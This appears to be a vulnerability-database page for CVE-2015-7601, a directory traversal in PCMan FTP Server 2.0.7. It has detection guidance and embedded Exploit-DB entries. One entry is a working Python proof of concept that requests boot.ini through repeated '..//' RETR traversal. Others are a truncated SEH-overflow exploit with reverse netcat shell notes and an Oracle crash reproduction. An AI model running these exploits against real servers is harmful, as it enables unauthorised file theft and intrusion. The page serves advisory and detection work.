CVE-2015-7601
published 2015-09-29CVE-2015-7601: Directory traversal vulnerability in PCMan's FTP Server 2.0.7 allows remote attackers to read arbitrary files via a ..// (dot dot double slash) in a RETR…
PriorityP265high7.8CVSS 2.0
AVNACLAuNCCINAN
EXPLOIT
EPSS
58.33%
99.0th percentile
Directory traversal vulnerability in PCMan's FTP Server 2.0.7 allows remote attackers to read arbitrary files via a ..// (dot dot double slash) in a RETR command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pcman_s_ftp_server_project | pcman_s_ftp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect FTP RETR commands containing the traversal pattern '..//' (dot dot double slash) which is the specific traversal sequence exploited in this CVE. ↗
- →Monitor FTP sessions for RETR commands with repeated '..//' sequences (e.g., 11 or more occurrences) targeting sensitive files such as boot.ini, indicating exploitation attempts. ↗
- →Flag use of the Metasploit auxiliary module pcman_ftp_traversal against FTP servers, which crafts RETR commands with '..//' traversal strings to download arbitrary files. ↗
- ·Exploit was tested specifically against Windows XP Service Pack 3 (English); traversal depth and target file paths may need adjustment for other OS versions or configurations. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
exploitdb·2016-01-11
CVE-2015-7768 Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
---
# Title: Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow.
# Date : 01/08/2016
# Author: TOMIWA.
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows 7 SP1 64bits
# Listen for a reverse netcat connection on port 4444
# root@kali:~# nc -nlvp 4444
# listening on [any] 4444 ...
# connect to [192.168.0.11] from (UNKNOWN) [192.168.0.109] 49158
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
# C:\Program Files (x86)\KONICA MINOLTA\FTP Utility>
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7A
Exploit-DB
PCMan FTP Server 2.0.7 - Directory Traversal
exploitdb·2015-09-28
CVE-2015-7601 PCMan FTP Server 2.0.7 - Directory Traversal
PCMan FTP Server 2.0.7 - Directory Traversal
---
#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Directory Traversal
# author: Jay Turla
# tested on Windows XP Service Pack 3 - English
# software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# description: PCMAN FTP 2.07 is vulnerable to Directory Traversal (quick and dirty code just for PoC)
from ftplib import FTP
ftp = FTP(raw_input("Target IP: "))
ftp.login()
ftp.retrbinary('RETR ..//..//..//..//..//..//..//..//..//..//..//boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
Exploit-DB
Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash (PoC)
exploitdb·2015-04-17·CVSS 4.6
CVE-2015-2572 [MEDIUM] Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash (PoC)
Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash (PoC)
---
# Exploit Title: Buffer Overflow in Oracle� Hyperion Smart View for Office
[DOS]
# Exploit Author: sajith
# Vendor Homepage: http://oracle.com
# vulnerable Version: Fusion Edition 11.1.2.3.000 Build 157
#Vulnerable Link:
http://www.oracle.com/technetwork/middleware/smart-view-for-office/downloads/index.html
# Tested in: Microsoft Windows 7 Enterprise 6.1.7601 Service Pack 1
[x64],en-us
#plugin tested with Microsoft Excel 2010
#CVE: CVE-2015-2572
Responsible Disclosure:
Reported to Oracle on Jul 7, 2014
patch released on April 14, 2015
How to reproduce the bug?
1)install "Smart view" and open Microsoft excel and click on "smart view"
tab
2)click on "Options" and then click on "Advanced" tab
3) In General menu in "
Metasploit
PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure
metasploit
PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure
PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure
This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as '..//'
No writeups or analysis indexed.
2015-09-29
Published